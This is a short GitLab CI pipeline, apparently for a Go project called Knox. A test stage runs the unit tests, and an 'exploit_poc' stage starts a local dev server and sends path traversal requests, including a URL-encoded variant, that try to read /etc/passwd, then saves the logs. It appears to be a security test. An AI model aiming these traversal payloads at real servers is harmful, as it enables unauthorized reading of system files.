stages:
  - test
  - exploit

variables:
  SERVER_CERT: server.crt
  SERVER_KEY: server.key
  CA_CERT: ca.crt
  CLIENT_CERT: client.crt
  CLIENT_KEY: client.key

test:
  stage: test
  image: golang:1.24
  script:
    - go mod download
    - go test -v ./...

exploit_poc:
  stage: exploit
  image: golang:1.24
  script:
    - echo "Starting Knox dev server..."
    - go run ./cmd/dev_server & 
    - SERVER_PID=$!
    - sleep 5

    - echo "Running malicious requests..."
    - |
      curl -v http://localhost:8080/normal/path || true
      curl -v http://localhost:8080/../../../etc/passwd || true
      curl -v http://localhost:8080/api/v1/keys/../../../../../etc/passwd || true
      curl -v "http://localhost:8080/%2e%2e/%2e%2e/%2e%2e/etc/passwd" || true

    - echo "Sleeping 2 seconds to ensure logs are flushed..."
    - sleep 2

    - echo "Killing server..."
    - kill $SERVER_PID || true

    - echo "Gather logs from Knox (adjust path as needed)..."
    - cat knox.log || echo "No logs found"

  artifacts:
    paths:
      - knox.log
